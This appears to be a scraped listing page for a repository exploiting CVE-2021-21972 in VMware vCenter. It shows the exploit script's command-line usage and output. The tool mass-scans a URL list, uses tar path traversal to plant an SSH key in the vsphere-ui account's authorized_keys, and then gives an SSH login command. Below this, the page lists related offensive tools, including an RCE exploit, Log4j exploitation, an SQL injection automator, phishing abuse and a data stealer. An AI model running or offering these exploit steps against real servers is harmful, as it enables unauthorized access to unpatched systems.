CVE-2021-21972

Last update: Nov 19, 2022

Overview

CVE-2021-21972

% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS 
Login using 'ssh -i id_rsa [email protected]'

% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972

% python3 /tmp/CVE_2021_21972.py -u https://172.16.164.1  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972

 % python3 CVE-2021-21972.py -h
Usage: CVE-2021-21972.py [options]

Options:
  -h, --help         show this help message and exit
  -i FILE            file containing list of urls
  -u URL, --url=URL  https://1.1.1.1
  -f FILENAME        
  -n NOOFTHREADS     
  -e, --exploit      
  -c, --check        
%

Owner

Keith Lee

GitHub Repository

Vulnerability Exploitation Code Collection Repository

Introduction expbox is an exploit code collection repository List CVE-2021-41349 Exchange XSS PoC = Exchange 2013 update 23 = Exchange 2016 update 2

263 Feb 14, 2022

A secure password generator written in python

gruvbox-factory 🏭 "The main focus when developing gruvbox is to keep colors easily distinguishable, contrast enough and still pleasant for the eyes"

430 Dec 27, 2022

Password-Manager GUI

PASSWORD-MANAGER This repo contains all the project files. Project Description A Tkinter GUI that allows you to store website info like website name,

1 Dec 08, 2021

Obfuscate your python code into a string of integers. De-obfuscate also supported.

int-obfuscator Obfuscate your python code into a string of integers. De-obfuscate also supported. How it works: Each printable character gets replaced

6 Nov 13, 2022

Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

🏆 Pancakeswap BSC Sniper Bot web3 with honeypot detector (ANDROID WINDOWS MAC LINUX) 🥇 ⭐️ ⭐️ ⭐️ First SNIPER BOT for ANDROID & WINDOWS with honeypot

12 Jan 07, 2023

SecurAID securely connects aid organizations directly with individuals in dangerous situations to allow them to discreetly and effectively get the assistance they need.

SecurAID securely connects aid organizations directly with individuals in dangerous situations to allow them to discreetly and effec

2 Mar 23, 2022

Using python 3 and Flask an MVC system where the AES 128 CBC and Trivium algorithms

This project was developed using python 3 and Flask, it is an MVC system where the AES 128 CBC and Trivium algorithms can be tested through a communication between the computer and a device such as a

1 Dec 26, 2021

Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

1k Dec 30, 2022

IDA Pro Python plugin to analyze and annotate Linux kernel alternatives

About This is an IDA Pro (Interactive Disassembler) plugin allowing to automatically analyze and annotate Linux kernel alternatives (content of .altin

16 Oct 12, 2022

Just another script for automatize boolean-based blind SQL injections.

SQL Blind Injection Tool A script for automatize boolean-based blind SQL injections. Works with SQLite at least, supports using cookies. It uses bitwi

51 Dec 15, 2022

SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

Bad Blood Bad Blood is an exploit for CVE-2021-20038, a stack-based buffer overflow in the httpd binary of SMA-100 series systems using firmware versi

80 Dec 29, 2022

Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod

96 Jan 02, 2023

MS-FSRVP coercion abuse PoC

ShadowCoerce MS-FSRVP coercion abuse PoC Credits: Gilles LIONEL (a.k.a. Topotam)

219 Dec 28, 2022

Privacy-respecting metasearch engine

Privacy-respecting, hackable metasearch engine / pronunciation səːks. If you are looking for running instances, ready to use, then visit searx.space.

12.4k Jan 08, 2023

An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several useful utilites to change the configuration of the device.

TMOHS1 Root Utility Description An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several

40 Dec 29, 2022

CVE-2021-21972

Related tags

Overview

CVE-2021-21972

Owner

Keith Lee

Vulnerability Exploitation Code Collection Repository

A secure password generator written in python

Password-Manager GUI

Obfuscate your python code into a string of integers. De-obfuscate also supported.

Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

SecurAID securely connects aid organizations directly with individuals in dangerous situations to allow them to discreetly and effectively get the assistance they need.

Using python 3 and Flask an MVC system where the AES 128 CBC and Trivium algorithms

Malware Configuration And Payload Extraction

IDA Pro Python plugin to analyze and annotate Linux kernel alternatives

Just another script for automatize boolean-based blind SQL injections.

SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

MS-FSRVP coercion abuse PoC

Privacy-respecting metasearch engine

An interactive python script that enables root access on the T-Mobile (Wingtech) TMOHS1, as well as providing several useful utilites to change the configuration of the device.

信息收集自动化工具

Remote control your Greenbone Vulnerability Manager (GVM)

Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack

These are Simple python scripts to test/scan your network

Growtopia Save.dat Stealer